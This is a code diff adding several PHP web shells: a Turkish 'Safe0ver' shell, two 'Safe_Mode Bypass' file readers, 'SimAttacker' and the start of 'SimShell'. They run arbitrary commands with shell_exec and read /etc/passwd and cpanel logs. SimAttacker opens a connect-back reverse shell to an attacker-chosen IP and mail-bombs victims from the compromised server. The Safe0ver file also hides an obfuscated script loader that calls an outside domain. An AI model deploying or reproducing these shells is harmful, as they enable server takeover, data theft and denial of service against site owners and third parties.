+             $objname = "Directory";
+             $objident = "Directory";
+          }
+         else {
+             $objname = "Filename";
+             $objident = "file";
+         }
+     }
+       echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+    If (empty($newfile) != true) {
+         echo "<center>";
+         $return = @rename($oldfile, "$olddir$newfile");
+        if ($return) {
+             echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+         }
+         else {
+             if ( @file_exists("$olddir$newfile") ) {
+                 echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+             }
+             else {
+                 echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+             }
+          }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+     }
+     else {
+         $dpos = strrpos($oldfile, "/");
+         if (strval($dpos)!="") {
+             $olddir = substr($oldfile, 0, $dpos+1);
+           }
+         else {
+             $olddir = "$lastdir/";
+        }
+         $fpos = strrpos($oldfile, "/");
+         if (strval($fpos)!="") {
+             $inputfile = substr($oldfile, $fpos+1);
+           }
+         else {
+             $inputfile = "";
+         }
+               echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+         echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+         echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+         echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+         echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+         echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+         echo "Rename \"$oldfile\" to:<br>\n";
+         echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+        echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+         echo "</td></tr></table></center>";
+     }
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>&nbsp;</td>
+ </tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+    $isMainMenu = true;
+     ?>
+    <table width="100%" border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="border">
+       <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+    <br>
+     <center>
+    <table border="0" NOWRAP>
+      <tr>
+      <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?>      </td>
+       <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
+        </span></td>
+     </tr>
+       </table>
+    <br><p><br>Safe Mode ByPAss<p><form method="POST">
+	<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
+	<input type="submit" value="Çalistir"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="dizin">
+                <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
+		<option value="cat /etc/passwd">cat /etc/passwd</option>
+		<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
+		<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
+		<option value="cat /etc/hosts">cat /etc/hosts</option>
+                <option value="cat /etc/named.conf">cat /etc/named.conf</option>
+                <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
+                <option value="netstat -an | grep -i listen">Açik Portlar</option>
+                <option value="ps -aux">Çalisan Uygulamalar</option>
+</select> <input type="submit" value="Çalistir"></p>
+	</form>
+------------------------------------------------------------------------------------<p>
+<?
+$evilc0der=$_POST['dizin'];
+if($_POST['dizin'])
+{
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$safemodgec = shell_exec($evilc0der);
+echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
+}
+?>
+<Script Language='Javascript'>
+<!-- HTML Encryption provided by iWEBTOOL.com -->
+<!--
+document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
+//-->
+</Script>
+</center>
+    <br>
+     <?php
+}
+
+if ($cmd != "downl") {
+    if ( $isMainMenu != true) {
+         ?>
+
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+         <tr>
+          <td width="100%" style="class="silver border">
+           <center><strong>
+            &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+            &nbsp;&nbsp;&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+            </strong></center>
+          </td>
+         </tr>
+        </table>
+        <br>
+        <?php
+}
+    ?>
+    <table width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+        </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?> 
+
+
+
+
+ 
+
+
+
+
+

php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php

@@ -0,0 +1,89 @@
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
+<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="?	"><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe 
+Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
+<form method="POST">
+	<p align="center"><input type="text" name="file" size="20">
+	<input type="submit" value="Open" name="B1"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="file">
+		<option value="/etc/passwd">Get /etc/passwd</option>
+		<option value="/var/cpanel/accounting.log">View cpanel logs</option>
+		<option value="/etc/syslog.conf">Syslog configuration</option>
+		<option value="/etc/hosts">Hosts</option>
+		</select> <input type="submit" value="Go" name="B1"></p>
+	</form>
+
+
+<?php
+/*
+Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+by PHP Emperor<xb5@hotmail.com>
+*/
+
+echo "<head><title>Safe Mode Shell</title></head>"; 
+
+
+
+
+$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+echo "<PRE>\n";
+if(empty($file)){
+if(empty($_GET['file'])){
+if(empty($_POST['file'])){
+die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
+COLOR=\"RED\">PHP Emperor
+xb5@hotmail.com</FONT></CENTER></B>");
+} else {
+$file=$_POST['file'];
+}
+} else {
+$file=$_GET['file'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "<B>--- Start File ".htmlspecialchars($file)."
+-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
+".htmlspecialchars($file)." ---------------\n";
+unlink($temp);
+die("\n<FONT COLOR=\"RED\"><B>File
+".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
+;]</B></FONT>");
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+?>

php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php

@@ -0,0 +1,90 @@
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
+<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="?	"><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe 
+Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
+<form method="POST">
+	<p align="center"><input type="text" name="file" size="20">
+	<input type="submit" value="Open" name="B1"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="file">
+		<option value="/etc/passwd">Get /etc/passwd</option>
+		<option value="/var/cpanel/accounting.log">View cpanel logs</option>
+		<option value="/etc/syslog.conf">Syslog configuration</option>
+		<option value="/etc/hosts">Hosts</option>
+		</select> <input type="submit" value="Go" name="B1"></p>
+	</form>
+
+
+<?php
+/*
+Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+by PHP Emperor<xb5@hotmail.com>
+*/
+
+echo "<head><title>Safe Mode Shell</title></head>"; 
+
+
+
+
+$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+echo "<PRE>\n";
+if(empty($file)){
+if(empty($_GET['file'])){
+if(empty($_POST['file'])){
+die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
+COLOR=\"RED\">PHP Emperor
+xb5@hotmail.com</FONT></CENTER></B>");
+} else {
+$file=$_POST['file'];
+}
+} else {
+$file=$_GET['file'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "<B>--- Start File ".htmlspecialchars($file)."
+-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
+".htmlspecialchars($file)." ---------------\n";
+unlink($temp);
+die("\n<FONT COLOR=\"RED\"><B>File
+".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
+;]</B></FONT>");
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+?>
+

php/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php

@@ -0,0 +1,378 @@
+<?
+//download Files  Code
+$fdownload=$_GET['fdownload'];
+if ($fdownload <> "" ){
+// path & file name
+$path_parts = pathinfo("$fdownload");
+$entrypath=$path_parts["basename"];
+$name = "$fdownload";
+$fp = fopen($name, 'rb');
+header("Content-Disposition: attachment; filename=$entrypath");
+header("Content-Length: " . filesize($name));
+fpassthru($fp);
+exit;
+}
+?>
+	
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
+<style>
+<!--
+body         { font-family: Tahoma; font-size: 8pt }
+-->
+</style>
+</head>
+<body>
+<?
+error_reporting(E_ERROR | E_WARNING | E_PARSE);
+
+ //File Edit
+ $fedit=$_GET['fedit'];
+ if ($fedit <> "" ){
+ $fedit=realpath($fedit);
+ $lines = file($fedit);
+ echo "<form action='' method='POST'>";
+echo "<textarea name='savefile' rows=30 cols=80>" ;
+foreach ($lines as $line_num => $line) {
+ echo htmlspecialchars($line);
+}
+echo "</textarea>
+	<input type='text' name='filepath'  size='60' value='$fedit'>
+	<input type='submit' value='save'></form>";
+	$savefile=$_POST['savefile'];
+	$filepath=realpath($_POST['filepath']);
+	if ($savefile <> "") 
+	{
+	$fp=fopen("$filepath","w+");
+	fwrite ($fp,"") ;
+	fwrite ($fp,$savefile) ;
+	fclose($fp);
+	echo "<script language='javascript'> close()</script>";
+	}
+exit();
+ }
+?>
+<?
+// CHmod - PRimission
+$fchmod=$_GET['fchmod'];
+if ($fchmod <> "" ){
+$fchmod=realpath($fchmod);
+echo "<center><br>
+chmod for :$fchmod<br>
+<form method='POST' action=''><br>
+Chmod :<br>
+<input type='text' name='chmod0' ><br>
+<input type='submit' value='change chmod'>
+</form>";
+$chmod0=$_POST['chmod0'];
+if ($chmod0 <> ""){
+chmod ($fchmod , $chmod0);
+}else {
+echo "primission Not Allow change Chmod";
+}
+exit();
+}
+?>
+	
+<div align="center">
+	<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
+		<tr>
+			<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
+				<p align="center"><b>
+				<font face="Tahoma" size="2"><br>
+				</font>
+				<font color="#D2D200" face="Tahoma" size="2">
+				<span style="text-decoration: none">
+				<font color="#000000">
+				<a href="?id=fm&dir=<?
+	echo getcwd();
+	?>
+	">
+				<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
+				<p align="center"><b><a href="?id=cmd">
+				<span style="text-decoration: none">
+				<font face="Tahoma" size="2" color="#000000">
+				CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
+				<p align="center"><b><a href="?id=fake-mail">
+				<font face="Tahoma" size="2" color="#000000">
+				<span style="text-decoration: none">Fake mail</span></font></a></b></p>
+				<p align="center"><b>
+				<font face="Tahoma" size="2" color="#000000">
+				<a href="?id=cshell">
+				<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
+				<p align="center"><b>
+				<font color="#000000" face="Tahoma" size="2">
+				<a href="?id=">
+				<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
+				<p>&nbsp;<p align="center">&nbsp;</td>
+			<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
+			<?
+			//*******************************************************
+			//Start Programs About US
+			$id=$_GET['id'];
+
+			if ($id=="") {
+			echo "
+			<font face='Arial Black' color='#808080' size='1'>
+***************************************************************************<br>
+&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
+&nbsp;Programer : Hossein Asgary <br>
+&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
+&nbsp;please : If you find bug or problems in program , tell me by : <br>
+&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
+Enjoy :) [Only 4 Best Friends ] <br>
+***************************************************************************</font></span></p>
+";
+
+echo "<font color='#333333' size='2'>OS :". php_uname();
+echo "<br>IP :". 
+($_SERVER['REMOTE_ADDR']);
+echo "</font>";
+
+
+			}
+			//************************************************************
+			//cmd-command line
+			$cmd=$_POST['cmd'];
+			if($id=="cmd"){
+		$result=shell_exec("$cmd");
+		echo "<br><center><h3> CMD ExeCute </h3></center>" ;
+		echo "<center>
+		<textarea rows=20 cols=70 >$result</textarea><br>
+		<form method='POST' action=''>
+		<input type='hidden' name='id' value='cmd'>
+		<input type='text' size='80' name='cmd' value='$cmd'>
+		<input type='submit' value='cmd'><br>";
+			
+			
+			
+			}
+			
+		//********************************************************	
+		
+		//fake mail = Use victim server 4 DOS - fake mail 
+		if ( $id=="fake-mail"){
+		error_reporting(0);
+		echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
+		echo "<center><form method='post' action=''>
+		Victim Mail :<br><input type='text' name='to' ><br>
+		Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
+		Comments:
+		<br>
+		<textarea rows='10' cols=50 name='Comments' ></textarea><br>
+		<input type='submit' value='Send Mail Strm ' >
+		</form></center>";
+		//send Storm Mail
+		$to=$_POST['to'];
+		$nom=$_POST['nom'];
+		$Comments=$_POST['Comments'];
+		if ($to <> "" ){
+		for ($i = 0; $i < $nom ; $i++){
+		$from = rand (71,1020000000)."@"."Attacker.com";
+		$subject= md5("$from");
+        mail($to,$subject,$Comments,"From:$from");
+        echo "$i is ok";
+        }      
+        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
+        }
+		}
+		//********************************************************
+
+			//Connect Back -Firewall Bypass
+			if ($id=="cshell"){
+			echo "<br>Connect back Shell , bypass Firewalls<br>
+			For user :<br>
+			nc -l -p 1019 <br>
+			<hr>
+			<form method='POST' action=''><br>
+			Your IP & BindPort:<br>
+			<input type='text' name='mip' >
+			<input type='text' name='bport' size='5' value='1019'><br>
+			<input type='submit' value='Connect Back'>
+			</form>";
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 if ($mip <> "")
+		 {
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		       $result = "Error: could not open socket connection";
+		 }
+		 else {
+		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
+	  while(!feof($fp)){ 
+       fputs ($fp," bash # ");
+       $result= fgets ($fp, 4096);
+      $message=`$result`;
+       fputs ($fp,"--> ".$message."\n");
+      }
+      fclose ($fp);
+		 }
+		 }
+			}
+			
+		//********************************************************
+			//Spy File Manager
+			$homedir=getcwd();
+			$dir=realpath($_GET['dir'])."/";
+			if ($id=="fm"){
+			echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
+                  &nbsp;<b>
+                  <form action='' method='GET'>
+                  &nbsp;Path:</b>
+                  <input type='hidden' name='id' value='fm'>
+                  <input type='text' name='dir' size='80' value='$dir'>
+                  <input type='submit' value='dir'>
+                  </form>
+                 <br>";
+
+			echo "
+
+<div align='center'>
+
+<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
+	<tr>
+		<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
+		<td height='28' width='82' align='center'>
+		<font color='#000080' size='2'><b>Size KByte</b></font></td>
+		<td height='28' width='83' align='center'>
+		<font color='#008000' size='2'><b>Download</b></font></td>
+		<td height='28' width='66' align='center'>
+		<font color='#FF9933' size='2'><b>Edit</b></font></td>
+		<td height='28' width='75' align='center'>
+		<font color='#999999' size='2'><b>Chmod</b></font></td>
+		<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
+	</tr>";
+		    if (is_dir($dir)){
+		    if ($dh=opendir($dir)){
+		    while (($file = readdir($dh)) !== false) {
+		    $fsize=round(filesize($dir . $file)/1024);
+		
+		    
+	echo " 
+	<tr>
+		<th width='250' height='22' align='left' nowrap>";
+		if (is_dir($dir.$file))
+		{
+		echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
+		}
+		else {
+		echo "<font size='2' color='#666666'>&nbsp;$file ";
+		}
+		echo "</a></font></th>
+		<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
+		if (is_file($dir.$file))
+		{
+		echo "$fsize";
+		}
+		else {
+		echo "&nbsp; ";
+		}
+		echo "
+		</b></font></td>
+		<td width='103' align='center' nowrap>";
+		if (is_file($dir.$file)){
+		if (is_readable($dir.$file)){
+		echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='77' align='center' nowrap>";
+		if (is_file($dir.$file))
+		{
+		if (is_readable($dir.$file)){
+		echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='86' align='center' nowrap>";
+		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+		echo "<font size='1' color='#999999'>Dont in windows";
+		}
+		else {
+		echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
+		}
+		echo "</a></font></td>
+		<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
+	</tr>
+	";
+		      }
+		      closedir($dh);
+		    } 
+		    }
+		    echo "</table>
+<form enctype='multipart/form-data' action='' method='POST'>
+ <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
+ Send this file: <input name='userfile' type='file' />
+ <inpt type='hidden' name='Fupath'  value='$dir'>
+ <input type='submit' value='Send File' />
+</form> 
+		    </div>";
+			}
+//Upload Files 
+$rpath=$_GET['dir'];
+if ($rpath <> "") {
+$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
+echo "<script language='javascript'> history.back(2)</script>";
+}
+ }
+ //file deleted
+$frpath=$_GET['fdelete'];
+if ($frpath <> "") {
+if (is_dir($frpath)){
+$matches = glob($frpath . '/*.*');
+if ( is_array ( $matches ) ) {
+  foreach ( $matches as $filename) {
+  unlink ($filename);
+  rmdir("$frpath");
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+echo "<script language='javascript'> history.back(1)</script>";
+  }
+  }
+  }
+  else{
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+unlink ("$frpath");
+echo "<script language='javascript'> history.back(1)</script>";
+exit(0);
+
+  }
+  
+
+}
+			?>
+			
+			</td>
+		</tr>
+		<tr>
+			<td style="border: 1px dotted #FFCC66">
+			<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
+			Copyright 2004-Simorgh Security<br>
+			Hossein-Asgari<br>
+			</font><font color="#c0c0c0" size="1" face="Tahoma">
+		<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
+		<font color="#666666">www.simorgh-ev.com</font></a></font></td>
+		</tr>
+	</table>
+</div>
+
+</body>
+
+</html>

php/SimShell 1.0 - Simorgh Security MGZ.php

@@ -0,0 +1,180 @@
+<?php
+
+/*Simorgh Security Magazine */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
